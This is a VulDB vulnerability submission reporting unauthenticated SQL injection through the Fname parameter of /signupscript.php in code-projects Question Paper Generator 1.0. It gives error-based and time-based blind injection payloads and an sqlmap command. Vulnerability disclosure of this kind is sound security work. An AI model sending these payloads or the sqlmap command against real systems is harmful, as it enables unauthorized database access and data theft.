Submeter #699591: code-projects question paper 1.0 /signupscript.php SQL Injectioninformação

Títulocode-projects question paper 1.0 /signupscript.php SQL Injection
Descrição# question-paper-generatorV1.0 – SQL Injection in `/signupscript.php` ## Product Information | Item | Details | |------|---------| | **Affected Product** | question paper generator| | **Vendor Homepage** | [https://code-projects.org/question-paper-generator-in-php-with-source-code](https://code-projects.org/question-paper-generator-in-php-with-source-code)| | **Download Link** | [https://code-projects.org/question-paper-generator-in-php-with-source-code/download](https://download.code-projects.org/details/3fcbd9f2-7bfd-4f7a-83e8-9080b80c3c77) | | **Version** | V1.0 | | **Vulnerable File** | `/signupscript.php` | | **Submitter** | yudeshui | ## Vulnerability Summary | Field | Description | |-------|-------------| | **Vulnerability Type** | SQL Injection | | **Root Cause** | The `Fname` POST parameter is concatenated directly into the SQL query without sanitization or validation. | | **Authentication Required** | None – exploitable remotely and anonymously | | **Impact** | Unauthorized database access, data leakage, alteration or deletion, full system compromise, denial of service | ## Proof-of-Concept Payloads ``` Parameter: Fname (POST) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: Fname=Test2' AND EXTRACTVALUE(8456,CONCAT(0x5c,0x7176767071,(SELECT (ELT(8456=8456,1))),0x7178707671)) AND 'pkVI'='pkVI&Lname=User2&contact=2002002002&collg=College2&board=Board2&[email protected]&passwd=pass2&address=TestAddr2&country=Country2&desc=Desc2&type=teacher Type: time-based blind Title: MySQL >= 5.0.12 RLIKE time-based blind Payload: Fname=Test2' RLIKE SLEEP(5) AND 'uGbW'='uGbW&Lname=User2&contact=2002002002&collg=College2&board=Board2&[email protected]&passwd=pass2&address=TestAddr2&country=Country2&desc=Desc2&type=teacher ``` ## Quick Verification with sqlmap ```bash sqlmap -u "http://dede:802/signupscript.php" \ --data="Fname=Test2&Lname=User2&contact=2002002002&collg=College2&board=Board2&[email protected]&passwd=pass2&address=TestAddr2&country=Country2&desc=Desc2&type=teacher" \ --level=5 --risk=3 --batch --dbms mysql ``` <img width="1152" height="1095" alt="Image" src="https://github.com/user-attachments/assets/f32f4d16-56ad-43d1-84f1-d9aec605872e" />
Fonte⚠️ https://github.com/rassec2/dbcve/issues/6
Utilizador
 yudeshui (UID 91129)
Submissão21/11/2025 17h14 (há 5 meses)
Moderação23/11/2025 10h49 (2 days later)
EstadoAceite
Entrada VulDB333347 [code-projects Question Paper Generator 1.0 POST Parameter /signupscript.php Fname Injeção SQL]
Pontos20

VoltarVisão GeralPróximo

Do you know our Splunk app?

Download it now for free!